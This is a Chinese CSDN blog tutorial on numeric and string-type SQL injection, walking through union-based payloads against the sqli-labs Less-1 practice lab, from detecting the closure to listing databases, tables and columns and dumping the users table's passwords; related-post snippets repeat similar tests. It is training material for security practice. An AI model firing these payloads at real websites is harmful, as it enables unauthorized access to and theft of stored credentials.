sql错误的字符串/数字型注入

最新推荐文章于 2024-09-07 15:36:16 发布
最新推荐文章于 2024-09-07 15:36:16 发布
阅读量660 收藏 13
点赞数 9
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80405937/article/details/140165898
版权

错误的字符串/数字型注入

1.数字型注入

当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。

2.字符型注入

当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

闭合的符号有区别而已

http://www.sqli-lab.cn/Less-1/?id=1 or 1=1 --

http://www.sqli-lab.cn/Less-1/?id=1' order by 3 --+ #字段数为3

http://www.sqli-lab.cn/Less-1/?id=1' and 1=2 union select 1,2,3 --+  #显示位为23

http://www.sqli-lab.cn/Less-1/?id=1' and 1=2 union select 1,version(),database() --+

查看所有数据库名

http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 –

查询security内的所有表名

http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

接着使用下面的语句爆破出列名

http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+

 

 

爆用户名和密码
 

http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,(select group_concat(password) from security.users) ,(select gro

                

        

        

    

  


    

      

        

            

              
                
                  2301_80405937
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    9
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    13
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
SQL 字符型注入

				
			

			

				

					MZa1213123的博客
				

				

					03-02
					
					4417
					
				

			

		

		

			
				
CTFHub SQL 字符型注入

可以看到我们输入的数据会被单引号所括上



尝试正常的 1 and 1=2 发现没有报错 还是有回显

字符型的 1 and 1=2 就相当于只是字符串 并没有发挥其表达式的作用所以这就没有产生错误回显

(不太明白为什么 sql 还是会查询到id = 1 的数据)



这时候我们添加 ' 手动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试


整个的 sql 语句大概是

$ sql = "select Data from table_name .

			
		

	



                

              
                



	

		

			

				
					
SQL注入数字型

				
			

			

				

					Vi_vids的博客
				

				

					10-20
					
					1942
					
				

			

		

		

			
				
基本漏洞篇
SQL注入数字型SQL注入就是在网站中注入sql语句,使其可以显示一些有用敏感信息
本章描述的数字型即是注入点为数字,采用GET方式
//sql_num.php
<?php
$conn = mysql_connect('localhost:3306','root','123456')or die('bad!');
//$conn定义一个名字为conn的变量
//使用账号root密码123456 去连接localhost这个mysql服务
mysql_query("SET NAMES 

			
		

	



                


  
              

                


	

		

			

				
					
SQL注入~数字型注入&字符型注入

				
			

			

				

					2401_82887816的博客
				

				

					04-26
					
					1399
					
				

			

		

		

			
				
看/后面的字符,数字这些。

			
		

	





	

		

			

				
					
sql注入_字符型、数字型判断

				
			

			

				

					草木
				

				

					01-12
					
					8026
					
				

			

		

		

			
				
如何判断sql注入是字符型还是数字型?

在进行sql注入时,字段类型分为字符型或者数字型,意味着我们需要构造不同的sql语句。

假设存在sql注入的url是:http://192.168.0.1/id=1
数字型判定
1、and或者or
假设数据库的执行语句是:select * from table where id=$id
当查询id=1的页面时返回正常页面,此时执行的语句是:select * from table where id=1
假如在1后面加上 and 1=2 , $id的值就是1 and 

			
		

	



		

			
		



	

		

			

				
					
理论篇8:SQL注入(字符型注入数字型注入)

				
			

			

				

					aiojay的博客
				

				

					05-02
					
					3512
					
				

			

		

		

			
				
SQL注入(字符型注入数字型注入),Mysql中 int(3) 类型的含义,判断MYSQL注入闭合方式:

			
		

	





	

		

			

				
					
sql注入数字型和字符型的原理 //(dvwa实战 sql injection low)

				
			

			

				

					weixin_43749051的博客
				

				

					03-04
					
					1778
					
				

			

		

		

			
				
1、数字型注入

当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。

测试步骤:

(1) 加单引号,URL:www.text.com/text.php?id=3’

对应的sql:select * from table where id=3’ 这时sql语句出错,不符合sql语法,让数据库系统报错,如果没报错就说明 ‘ 被过滤了,这样不存在注入的可能。

(2) 加and 1=1 ,URL:www.text.com/text.php?id=3 and 1=1

对应的sql:select *

			
		

	





	

		

			

				
					
PIKACHU靶场 ——字符和数字型SQL注入练习

				
			

			

				

					PICACHU+++的博客
				

				

					04-03
					
					871
					
				

			

		

		

			
				
进入靶场可以看见一个输入框,所以现在里面判断注入点类型,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符型SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符型SQL注入漏洞。

			
		

	





	

		

			

				
					
SQL注入之字符型、数字型注入原理及注入步骤(sqli-labs-master 1-2关)

				
			

			

				

					qiqi_w的博客
				

				

					11-27
					
					6297
					
				

			

		

		

			
				
SQL注入之字符型、数字型注入原理及注入步骤
sqli-labs-master 1-2关演示截图

			
		

	





	

		

			

				
					
SQL Server中利用正则表达式替换字符串的方法

				
			

			

				

					09-09
				

			

		

		

			
				
正则表达式(Regular Expression)是一种文本模式,包含普通字符(例如,字母和数字)和特殊字符(称为"元字符"),用于字符串的搜索、替换、匹配和分割等功能。在编程和数据处理中正则表达式是处理文本和数据非常有力...

			
		

	





	

		

			

				
					
数据同步是如何实现的?为什么需要数据同步?

				
			

			

				

					oOBubbleX的博客
				

				

					09-05
					
					849
					
				

			

		

		

			
				
实时数据同步,确保数据的一致性和实时更新性,将有利于企业各部门之间高效协作,从而支持企业的业务运作和决策。本文将介绍数据同步概念、数据同步的步骤、数据同步的方式,从而加深对数据同步的认识。

			
		

	





	

		

			

				
					
华为云征文|Flexus云服务X实例应用,通过QT连接华为云MySQL,进行数据库的操作,数据表的增删改查

				
			

			

				

					Arya的博客,专注后端领域
				

				

					09-03
					
					1098
					
				

			

		

		

			
				
4核12G-100G-3M规格的Flexus X实例使用测评第3弹:Flexus云服务X实例应用,通过QT连接华为云MySQL,进行数据库的操作,数据表的增删改查

			
		

	





	

		

			

				
					
如何防止常见的Web应用安全漏洞!

				
			

			

				

					MJH827的博客
				

				

					09-04
					
					768
					
				

			

		

		

			
				
Web应用的广泛使用伴随着各种安全威胁。近年来,许多企业因忽视Web应用的安全性而遭受重大损失。本文将介绍几种常见的Web应用安全漏洞,并提供具体的防护方案和实战演练。

			
		

	





	

		

			

				
					
分布式事务

				
			

			

				

					2301_80339238的博客
				

				

					09-04
					
					956
					
				

			

		

		

			
				
通过前面微服务保护中,我们知道当项目拆分到不同服务后,每个服务都有自己独立的数据库,独立的tomcat,所以事务的ACID的这种特性就没法满足了。例如下面我们订单服务调用了购物车服务和库存服务,如果调用库存服务出现失败,尽管可以通过抛出异常控制订单服务回滚,但是购物车服务不能感知到异常的。在分布式系统中,如果一个业务需要多个服务合作完成,并且每一个服务都有事务,多个事务必须同时成功或失败,这样的事务就是分布式事务。其中的每个服务的事务就是一个分支事务。整个业务称为全局事务。

			
		

	





	

		

			

				
					
mongodb在Java中条件分组聚合查询并且分页(时间戳,按日期分组,年月日...)

				
			

			

				

					简单发点工作中用到的,或者记录下小知识点
				

				

					09-03
					
					1623
					
				

			

		

		

			
				
按时间 年月日条件分组,筛选数据,统计数据,聚合查询
打印出mongo的SQL语句

			
		

	





	

		

			

				
					
jmeter之setUP、tearDown线程组

					
最新发布

				
			

			

				

					回家吃月饼的学习交流地
				

				

					09-07
					
					174
					
				

			

		

		

			
				
jmeter之setUP、tearDown线程组的使用

			
		

	





	

		

			

				
					
nmt---Docker-compose自动化部署

				
			

			

				

					qq_69920145的博客
				

				

					09-03
					
					1026
					
				

			

		

		

			
				
static-rr 权重, leastconn 最少连接, source 请求IP, 轮询 roundrobin。# 这⾥是容器中的IP地址,由于配置的是轮询roundrobin,weight 权重其实没有⽣效。# 这⾥是容器中的IP地址,由于配置的是轮询roundrobin,weight 权重其实没有⽣效。# 在 mysql 创建⼀个没有权限的haproxy⽤户,密码为空。# 在 mysql 创建⼀个没有权限的haproxy⽤户,密码为空。10. docker-compose移除容器。

			
		

	





	

		

			

				
					
【重学 MySQL】十四、显示表结构

				
			

			

				

					CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
				

				

					09-06
					
					498
					
				

			

		

		

			
				
以上就是在MySQL中显示表结构的几种常用方法。DESCRIBE或DESC命令和命令提 供了快速查看表列信息的简便方式,而查询数据库则提供了更详细、更灵活的信息获取方式。命令则适用于需要查看或复制表完整结构的情况。

			
		

	





	

		

			

				
					
怎么判断sql注入数字型还是字符型



				
			

			

				

					07-12
				

			

		

		

			
				
如果参数是字符类型,在查询语句中使用字符串型的占位符。  3. 错误信息:观察错误信息能够提供一些线索。如果 SQL 查询出现错误数据库返回的错误信息可能暗示了注入类型。例如,如果错误信息中包含了关于无效转换...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值